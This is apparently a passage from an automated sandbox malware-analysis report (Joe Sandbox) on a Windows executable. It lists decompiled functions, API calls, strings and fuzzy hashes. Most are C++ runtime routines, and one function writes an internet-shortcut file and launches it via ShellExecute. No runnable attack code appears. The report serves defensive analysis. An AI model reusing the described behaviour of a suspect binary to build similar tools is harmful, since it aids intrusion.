                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4420db6cdaabf3eab84c2076deb9dd810405238e9baf0b4cda23d510a6ba968c
                                                                  • Instruction ID: 571566cfa7c012e6e25681d3d352553654bd5427784e8a0589722ed1a9039fed
                                                                  • Opcode Fuzzy Hash: 4420db6cdaabf3eab84c2076deb9dd810405238e9baf0b4cda23d510a6ba968c
                                                                  • Instruction Fuzzy Hash: 2BE1CF746806058FCB24CF68C580ABEB7F1FF49310F64869DD5969B691D730EE41EB12
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Similarity
                                                                  • API ID: ErrorLastProcess$CurrentFeatureInfoLocalePresentProcessorTerminate
                                                                  • String ID:
                                                                  • API String ID: 3471368781-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B4011D
                                                                  • collate.LIBCPMT ref: 00B40126
                                                                    • Part of subcall function 00B3EDF2: __EH_prolog3_GS.LIBCMT ref: 00B3EDF9
                                                                    • Part of subcall function 00B3EDF2: __Getcoll.LIBCPMT ref: 00B3EE5D
                                                                  • __Getcoll.LIBCPMT ref: 00B4016C
                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B40180
                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B40195
                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B401D3
                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B401E6
                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B4022C
                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B40260
                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B4031B
                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B4032E
                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B4034B
                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B40368
                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B40385
                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B402BD
                                                                    • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
                                                                    • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
                                                                  • numpunct.LIBCPMT ref: 00B403C4
                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B403D4
                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B40418
                                                                    • Part of subcall function 00B26330: LocalAlloc.KERNELBASE(00000040,?,00B30E04,00000020,?,?,00B29942,00000000,823FDEC6,?,?,?,?,00B650DD,000000FF), ref: 00B26336
                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B4042B
                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B40448
                                                                  Similarity
                                                                  • API ID: AddfacLocimp::_Locimp_std::locale::_$GetcollLockitstd::_$AllocH_prolog3H_prolog3_LocalLockit::_Lockit::~_collatenumpunct
                                                                  • String ID:
                                                                  • API String ID: 3717464618-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?), ref: 00B2667E
                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00B266D7
                                                                  • LocalAlloc.KERNEL32(00000040,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00B266E2
                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00B266FE
                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,00B649E5,000000FF), ref: 00B267DB
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00B649E5,000000FF), ref: 00B267E7
                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00B649E5), ref: 00B2682F
                                                                  • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,?,?,00B649E5,000000FF), ref: 00B2684A
                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00B649E5), ref: 00B26867
                                                                  • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00B649E5,000000FF), ref: 00B26891
                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 00B268D8
                                                                  • ShellExecuteW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000005), ref: 00B2692A
                                                                  • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,00B649E5,000000FF), ref: 00B2695C
                                                                  Similarity
                                                                  • API ID: ByteCharLocalMultiWide$AllocExecuteFileFreeShell$CloseCreateHandleWrite
                                                                  • String ID: -_.~!*'();:@&=+$,/?#[]$URL Shortcut content:$[InternetShortcut]URL=$open
                                                                  • API String ID: 2199533872-3004881174
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(00B7DD3C,00000FA0,?,?,00B42B6A), ref: 00B42B98
                                                                  • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00B42B6A), ref: 00B42BA3
                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00B42B6A), ref: 00B42BB4
                                                                  • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00B42BC6
                                                                  • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00B42BD4
                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00B42B6A), ref: 00B42BF7
                                                                  • DeleteCriticalSection.KERNEL32(00B7DD3C,00000007,?,?,00B42B6A), ref: 00B42C13
                                                                  • CloseHandle.KERNEL32(00000000,?,?,00B42B6A), ref: 00B42C23
                                                                  Strings
                                                                  • WakeAllConditionVariable, xrefs: 00B42BCC
                                                                  • kernel32.dll, xrefs: 00B42BAF
                                                                  • SleepConditionVariableCS, xrefs: 00B42BC0
                                                                  • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00B42B9E
                                                                  Similarity
                                                                  • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                  • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                  • API String ID: 2565136772-3242537097
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • IsInExceptionSpec.LIBVCRUNTIME ref: 00B45DAC
                                                                  • type_info::operator==.LIBVCRUNTIME ref: 00B45DCE
                                                                  • ___TypeMatch.LIBVCRUNTIME ref: 00B45EDD
                                                                  • IsInExceptionSpec.LIBVCRUNTIME ref: 00B45FAF
                                                                  • _UnwindNestedFrames.LIBCMT ref: 00B46033
                                                                  • CallUnexpected.LIBVCRUNTIME ref: 00B4604E
                                                                  Similarity
                                                                  • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                  • String ID: csm$csm$csm
                                                                  • API String ID: 2123188842-393685449
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • OpenProcess.KERNEL32(00000400,00000000,?,823FDEC6,?,?,?), ref: 00B242D2
                                                                  • OpenProcess.KERNEL32(00000400,00000000,?,?,823FDEC6,?,?,?), ref: 00B242F3
                                                                  • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,823FDEC6,?,?,?), ref: 00B24326
                                                                  • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,823FDEC6,?,?,?), ref: 00B24337
                                                                  • CloseHandle.KERNEL32(00000000,?,823FDEC6,?,?,?), ref: 00B24355
                                                                  • CloseHandle.KERNEL32(00000000,?,823FDEC6,?,?,?), ref: 00B24371
                                                                  • CloseHandle.KERNEL32(00000000,?,823FDEC6,?,?,?), ref: 00B24399
                                                                  • CloseHandle.KERNEL32(00000000,?,823FDEC6,?,?,?), ref: 00B243B5
                                                                  • CloseHandle.KERNEL32(00000000,?,823FDEC6,?,?,?), ref: 00B243D3
                                                                  • CloseHandle.KERNEL32(00000000,?,823FDEC6,?,?,?), ref: 00B243EF
                                                                  Similarity
                                                                  • API ID: CloseHandle$Process$OpenTimes
                                                                  • String ID:
                                                                  • API String ID: 1711917922-0
                                                                  • Opcode ID: a7f3fe8167830a47c2000b69fa58517bb746440c85f7910cfc2cfbb0c2ca7200
                                                                  • Instruction ID: 26da529038f54cb3f5eb57982a9b2dbe5af5d7e205f370f111ed73bbae022340
                                                                  • Opcode Fuzzy Hash: a7f3fe8167830a47c2000b69fa58517bb746440c85f7910cfc2cfbb0c2ca7200
                                                                  • Instruction Fuzzy Hash: E8516371D01218EBDB11CFA8D984BEEBBF8FF49714F244299E528B76C0C77459058B68
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B3BBC4
                                                                    • Part of subcall function 00B3254E: __EH_prolog3.LIBCMT ref: 00B32555
                                                                    • Part of subcall function 00B3254E: std::_Lockit::_Lockit.LIBCPMT ref: 00B3255F
                                                                    • Part of subcall function 00B3254E: std::_Lockit::~_Lockit.LIBCPMT ref: 00B325D0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog3Lockitstd::_$Lockit::_Lockit::~_
                                                                  • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                  • API String ID: 1538362411-2891247106
                                                                  • Opcode ID: 800a9f84e40b56898f6ee73239590a7acbbcd254132d9e7c51e03ad52da36d04
                                                                  • Instruction ID: 06cf9c15e7f56c3071eb920f0c70ab564cb3f03b1047a2bad8533a6838080723
                                                                  • Opcode Fuzzy Hash: 800a9f84e40b56898f6ee73239590a7acbbcd254132d9e7c51e03ad52da36d04
                                                                  • Instruction Fuzzy Hash: E5B19F7650010AAFCF19DF68CD95EFE3BE9EB04304F24459AFB06A6269D731CA10DB60
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B40CA4
                                                                    • Part of subcall function 00B29270: std::_Lockit::_Lockit.LIBCPMT ref: 00B292A0
                                                                    • Part of subcall function 00B29270: std::_Lockit::_Lockit.LIBCPMT ref: 00B292C2
                                                                    • Part of subcall function 00B29270: std::_Lockit::~_Lockit.LIBCPMT ref: 00B292EA
                                                                    • Part of subcall function 00B29270: std::_Lockit::~_Lockit.LIBCPMT ref: 00B29422
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                  • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                  • API String ID: 1383202999-2891247106
                                                                  • Opcode ID: dc093fa54eb6b5d4f9ac053d2aba1ed2611626ec3e271f1017b1b618041d976b
                                                                  • Instruction ID: efcc6da548b7d526c215b948aa401fa754b843db62c64ccae2ec459df535f6cf
                                                                  • Opcode Fuzzy Hash: dc093fa54eb6b5d4f9ac053d2aba1ed2611626ec3e271f1017b1b618041d976b
                                                                  • Instruction Fuzzy Hash: 35B19E7191010AAFCF29EFA8C995DFE3BF9EF14300F1405A9FA06A6261D631DB54EB50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B3BF85
                                                                    • Part of subcall function 00B28610: std::_Lockit::_Lockit.LIBCPMT ref: 00B28657
                                                                    • Part of subcall function 00B28610: std::_Lockit::_Lockit.LIBCPMT ref: 00B28679
                                                                    • Part of subcall function 00B28610: std::_Lockit::~_Lockit.LIBCPMT ref: 00B286A1
                                                                    • Part of subcall function 00B28610: std::_Lockit::~_Lockit.LIBCPMT ref: 00B2880E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                  • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                  • API String ID: 1383202999-2891247106
                                                                  • Opcode ID: 95d1077bd2d3dd2c1d83e3a60d3d4df15156ecd5eced0dade32c3ced41a1bf7a
                                                                  • Instruction ID: 3d7a7e9fa3e91b6807c7b37e013645723a930d68fc32f2dcfb3ae6cf8e44ba10
                                                                  • Opcode Fuzzy Hash: 95d1077bd2d3dd2c1d83e3a60d3d4df15156ecd5eced0dade32c3ced41a1bf7a
                                                                  • Instruction Fuzzy Hash: 09B17C7254010AAFCF19EEE8CD95DBE3FE9EB08340F254199FA06B6252D631DA10DB60
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 00B3855C
                                                                  • _Maklocstr.LIBCPMT ref: 00B385C5
                                                                  • _Maklocstr.LIBCPMT ref: 00B385D7
                                                                  • _Maklocchr.LIBCPMT ref: 00B385EF
                                                                  • _Maklocchr.LIBCPMT ref: 00B385FF
                                                                  • _Getvals.LIBCPMT ref: 00B38621
                                                                    • Part of subcall function 00B31CD4: _Maklocchr.LIBCPMT ref: 00B31D03
                                                                    • Part of subcall function 00B31CD4: _Maklocchr.LIBCPMT ref: 00B31D19
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
                                                                  • String ID: false$true
                                                                  • API String ID: 3549167292-2658103896
                                                                  • Opcode ID: c819698b01062a50eba040cad5d6f2bf84762e60d77d4a99bdf237e123ac0f77
                                                                  • Instruction ID: 256abaf6dd221e23e14a11e5adc4202a2cb57292656e90f5cbedab16b615ce26
                                                                  • Opcode Fuzzy Hash: c819698b01062a50eba040cad5d6f2bf84762e60d77d4a99bdf237e123ac0f77
                                                                  • Instruction Fuzzy Hash: C12195B2D00314AADF14EFA4D885ACF7BFCEF04710F148596F9189F152DA748644CBA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • LocalAlloc.KERNEL32(00000040,40000022,823FDEC6,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00B24154
                                                                  • LocalAlloc.KERNEL32(00000040,3FFFFFFF,823FDEC6,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00B24177
                                                                  • LocalFree.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00B24217
                                                                  • OpenProcess.KERNEL32(00000400,00000000,?,823FDEC6,?,?,?), ref: 00B242D2
                                                                  • OpenProcess.KERNEL32(00000400,00000000,?,?,823FDEC6,?,?,?), ref: 00B242F3
                                                                  • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,823FDEC6,?,?,?), ref: 00B24326
                                                                  • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,823FDEC6,?,?,?), ref: 00B24337
                                                                  • CloseHandle.KERNEL32(00000000,?,823FDEC6,?,?,?), ref: 00B24355
                                                                  • CloseHandle.KERNEL32(00000000,?,823FDEC6,?,?,?), ref: 00B24371
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: Process$Local$AllocCloseHandleOpenTimes$Free
                                                                  • String ID:
                                                                  • API String ID: 1424318461-0
                                                                  • Opcode ID: 926cd98e4c2ec4433573becd8c7e67fd103470da40370e51e943c2976e561c90
                                                                  • Instruction ID: 26a761602954b05388984dcd43b2fa49ad756d2f6a718a5100d33a7cf4146478
                                                                  • Opcode Fuzzy Hash: 926cd98e4c2ec4433573becd8c7e67fd103470da40370e51e943c2976e561c90
                                                                  • Instruction Fuzzy Hash: 0E81A271A00215DFCB14CFA8D985BAEBBF4FB48710F244269E929A77D0D774A9408B94
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetCPInfo.KERNEL32(?,?,?,?,?), ref: 00B426F8
                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00B42786
                                                                  • __alloca_probe_16.LIBCMT ref: 00B427B0
                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00B427F8
                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00B42812
                                                                  • __alloca_probe_16.LIBCMT ref: 00B42838
                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00B42875
                                                                  • CompareStringEx.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00B42892
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide$__alloca_probe_16$CompareInfoString
                                                                  • String ID:
                                                                  • API String ID: 3603178046-0
                                                                  • Opcode ID: 45e3fd132ffcad6234566cd9b31a33edd92fc1b0e84fbca05338ca18d8303c8a
                                                                  • Instruction ID: fea1a668c3d0d30bb2a5b9452113041e524eb843c85b334c0ba0deeb8623b4b7
                                                                  • Opcode Fuzzy Hash: 45e3fd132ffcad6234566cd9b31a33edd92fc1b0e84fbca05338ca18d8303c8a
                                                                  • Instruction Fuzzy Hash: BF719035900209ABDF219FA4CC85AEE7BF6EF45750FA80199F904A7251DB75CE00FB60
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00B421A3
                                                                  • __alloca_probe_16.LIBCMT ref: 00B421CF
                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00B4220E
                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B4222B
                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00B4226A
                                                                  • __alloca_probe_16.LIBCMT ref: 00B42287
                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B422C9
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00B422EC
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                  • String ID:
                                                                  • API String ID: 2040435927-0
                                                                  • Opcode ID: 987618307a6c803df56da37b4279099dfe78bda6bc507914dc1eab4e6bdf1720
                                                                  • Instruction ID: 08155613ef4a3629ed60c922eaf66157a5e1a10af7522ddeedadae2af7124173
                                                                  • Opcode Fuzzy Hash: 987618307a6c803df56da37b4279099dfe78bda6bc507914dc1eab4e6bdf1720
                                                                  • Instruction Fuzzy Hash: 80519E7260021ABFDF209F64CC85FAA7BF9EF44740F5544A9FA15A7190DB748E10BBA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B28657
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B28679
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B286A1
                                                                  • LocalAlloc.KERNEL32(00000040,00000044,00000000,823FDEC6,?,00000000), ref: 00B286F9
                                                                  • __Getctype.LIBCPMT ref: 00B2877B
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B287E4
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B2880E
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_GetctypeLocalRegister
                                                                  • String ID:
                                                                  • API String ID: 2372200979-0
                                                                  • Opcode ID: 299e85e550608323bfb682abe9217059b7781afe28a492c2d56fb0db7752abde
                                                                  • Instruction ID: d9b55f2dcb6e5791f384a744e90760c83da2bda9ddc6654960839abd3ab85519
                                                                  • Opcode Fuzzy Hash: 299e85e550608323bfb682abe9217059b7781afe28a492c2d56fb0db7752abde
                                                                  • Instruction Fuzzy Hash: 6861E0B1D01654CFDB21DF68D940B9ABBF4FF14314F248299D849AB391EB34AE85CB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B292A0
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B292C2
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B292EA
                                                                  • LocalAlloc.KERNEL32(00000040,00000018,00000000,823FDEC6,?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00B29342
                                                                  • __Getctype.LIBCPMT ref: 00B293BD
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B293F8
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B29422
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_GetctypeLocalRegister
                                                                  • String ID:
                                                                  • API String ID: 2372200979-0
                                                                  • Opcode ID: 374a3799a42af7986b47125e640c3c7b1c0203686e624a1379b9e03d49a36881
                                                                  • Instruction ID: dfcfb2a79568504e941d981ce5534c3d58030a906375d52feed9d5a48711fe75
                                                                  • Opcode Fuzzy Hash: 374a3799a42af7986b47125e640c3c7b1c0203686e624a1379b9e03d49a36881
                                                                  • Instruction Fuzzy Hash: 19519771904228DFCB21DF68D844BAEBBF4EF14714F248199E84DAB391DB74AE41CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • _ValidateLocalCookies.LIBCMT ref: 00B43F57
                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00B43F5F
                                                                  • _ValidateLocalCookies.LIBCMT ref: 00B43FE8
                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00B44013
                                                                  • _ValidateLocalCookies.LIBCMT ref: 00B44068
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
